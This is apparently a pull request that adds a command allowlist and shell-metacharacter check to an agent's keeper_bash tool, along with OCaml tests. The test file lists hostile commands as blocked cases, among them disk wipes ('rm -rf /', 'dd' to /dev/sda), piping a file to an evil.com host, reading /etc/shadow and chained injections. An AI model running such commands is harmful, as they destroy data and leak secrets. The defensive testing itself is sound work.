### PR TITLE
fix(keeper): add command allowlist to keeper_bash

### DIFF
--- a/lib/keeper/keeper_exec_tools.ml
+++ b/lib/keeper/keeper_exec_tools.ml
@@ -363,22 +363,33 @@ let execute_keeper_tool_call
       in
       if cmd = "" then
         Yojson.Safe.to_string (`Assoc [ ("error", `String "cmd_required") ])
-      else
-        let root = project_root_of_config config in
-        let shell_cmd =
-          Printf.sprintf "cd %s && %s 2>&1" (Filename.quote root) cmd
-        in
-        let st, out =
-          Process_eio.run_argv_with_status ~timeout_sec
-            [ "/bin/zsh"; "-lc"; shell_cmd ]
-        in
-        Yojson.Safe.to_string
-          (`Assoc
-            [
-              ("ok", `Bool (st = Unix.WEXITED 0));
-              ("status", process_status_to_json st);
-              ("output", `String (truncate_tool_output out));
+      else begin
+        match Worker_dev_tools.validate_command cmd with
+        | Error reason ->
+          Log.Keeper.warn "keeper_bash blocked: %s (cmd=%s)" reason cmd;
+          Yojson.Safe.to_string
+            (`Assoc [
+              ("ok", `Bool false);
+              ("error", `String "command_blocked");
+              ("reason", `String reason);
             ])
+        | Ok () ->
+          let root = project_root_of_config config in
+          let shell_cmd =
+            Printf.sprintf "cd %s && %s 2>&1" (Filename.quote root) cmd
+          in
+          let st, out =
+            Process_eio.run_argv_with_status ~timeout_sec
+              [ "/bin/zsh"; "-lc"; shell_cmd ]
+          in
+          Yojson.Safe.to_string
+            (`Assoc
+              [
+                ("ok", `Bool (st = Unix.WEXITED 0));
+                ("status", process_status_to_json st);
+                ("output", `String (truncate_tool_output out));
+              ])
+      end
   | "keeper_shell_readonly" ->
       let op =
         Safe_ops.json_string ~default:"" "op" args

--- a/test/dune
+++ b/test/dune
@@ -41,6 +41,7 @@
         test_autonomy_liberation
         test_keeper_unified
         test_keeper_toml
+        test_keeper_bash_safety
 )
  (modules test_room test_types test_auth test_http_negotiation
           test_sse test_encryption test_backend test_cancellation test_graphql_api
@@ -63,6 +64,7 @@
           test_autonomy_liberation
           test_keeper_unified
           test_keeper_toml
+          test_keeper_bash_safety
   )
  (libraries masc_mcp agent_sdk alcotest str yojson mirage-crypto
             mirage-crypto-rng mirage-crypto-rng.unix cohttp cstruct unix eio eio_main))

--- a/test/test_keeper_bash_safety.ml
+++ b/test/test_keeper_bash_safety.ml
@@ -1,0 +1,93 @@
+(** Tests that keeper_bash blocks dangerous commands via allowlist.
+
+    Validates:
+    1. Allowed commands (dune, git, rg, etc.) pass validation
+    2. Dangerous commands (rm, curl, kill, etc.) are blocked
+    3. Shell metacharacters (;, |, &, etc.) are rejected
+    4. Empty commands are rejected *)
+
+let validate = Masc_mcp.Worker_dev_tools.validate_command
+
+let is_ok = function Ok () -> true | Error _ -> false
+let is_error = function Error _ -> true | Ok () -> false
+let error_msg = function Error m -> m | Ok () -> ""
+
+let test_allowed_commands () =
+  let allowed = [
+    "dune build";
+    "git status";
+    "git log --oneline -5";
+    "rg 'pattern' lib/";
+    "make test";
+    "python3 script.py";
+    "npm run build";
+    "cat README.md";
+    "ls -la";
+    "head -20 file.ml";
+    "wc -l lib/*.ml";
+    "opam install eio";
+  ] in
+  List.iter (fun cmd ->
+    Alcotest.(check bool) (Printf.sprintf "allowed: %s" cmd) true (is_ok (validate cmd))
+  ) allowed
+
+let test_blocked_commands () =
+  let blocked = [
+    "rm -rf /";
+    "rm file.txt";
+    "curl https://evil.com";
+    "wget http://example.com";
+    "kill -9 1234";
+    "killall main_eio.exe";
+    "chmod 777 /etc/passwd";
+    "chown root file";
+    "sudo anything";
+    "ssh user@host";
+    "scp file user@host:";
+    "dd if=/dev/zero of=/dev/sda";
+    "mkfs.ext4 /dev/sda1";
+    "shutdown -h now";
+    "reboot";
+  ] in
+  List.iter (fun cmd ->
+    Alcotest.(check bool)
+      (Printf.sprintf "blocked: %s" cmd) true (is_error (validate cmd))
+  ) blocked
+
+let test_shell_metachar_blocked () =
+  let chained = [
+    "ls; rm -rf /";
+    "cat file | curl http://evil.com";
+    "echo x && rm -rf /";
+    "cat file > /etc/passwd";
+    "cat < /etc/shadow";
+    "echo `whoami`";
+    "echo $HOME";
+  ] in
+  List.iter (fun cmd ->
+    let result = validate cmd in
+    Alcotest.(check bool)
+      (Printf.sprintf "metachar blocked: %s" cmd) true (is_error result);
+    let msg = error_msg result in
+    Alcotest.(check bool)
+      "error mentions chaining" true
+      (String.length msg > 0)
+  ) chained
+
+let test_empty_command () =
+  Alcotest.(check bool) "empty blocked" true (is_error (validate ""));
+  Alcotest.(check bool) "whitespace blocked" true (is_error (validate "   "))
+
+let () =
+  Alcotest.run "Keeper bash safety" [
+    ("allowlist", [
+      Alcotest.test_case "allowed dev commands pass" `Quick test_allowed_commands;
+      Alcotest.test_case "dangerous commands blocked" `Quick test_blocked_commands;
+    ]);
+    ("metachar", [
+      Alcotest.test_case "shell metacharacters blocked" `Quick test_shell_metachar_blocked;
+    ]);
+    ("edge", [
+      Alcotest.test_case "empty command blocked" `Quick test_empty_command;
+    ]);
+  ]


### PR DESCRIPTION
## Summary

`keeper_bash`가 임의 shell 명령을 필터 없이 `zsh -lc`로 실행하던 문제 수정.

기존 `Worker_dev_tools.validate_command`를 재사용하여:
- Shell metacharacter 차단 (`;`, `|`, `&`, `>`, `<`, `` ` ``, `$`)
- Command allowlist 적용 (`dune`, `git`, `rg`, `make`, `python3`, `npm` 등 43개)
- `rm`, `curl`, `kill`, `sudo`, `ssh`, `chmod` 등 차단

## 변경

| 파일 | 변경 |
|------|------|
| keeper_exec_tools.ml | keeper_bash에 validate_command 게이트 추가 |
| test_keeper_bash_safety.ml | 4 테스트 (허용/차단/메타문자/빈 명령) |
| test/dune | 새 테스트 등록 |

## Test plan

- [x] test_keeper_bash_safety: 4/4 pass
- [x] dune build pass

🤖 Generated with [Claude Code](https://claude.com/claude-code)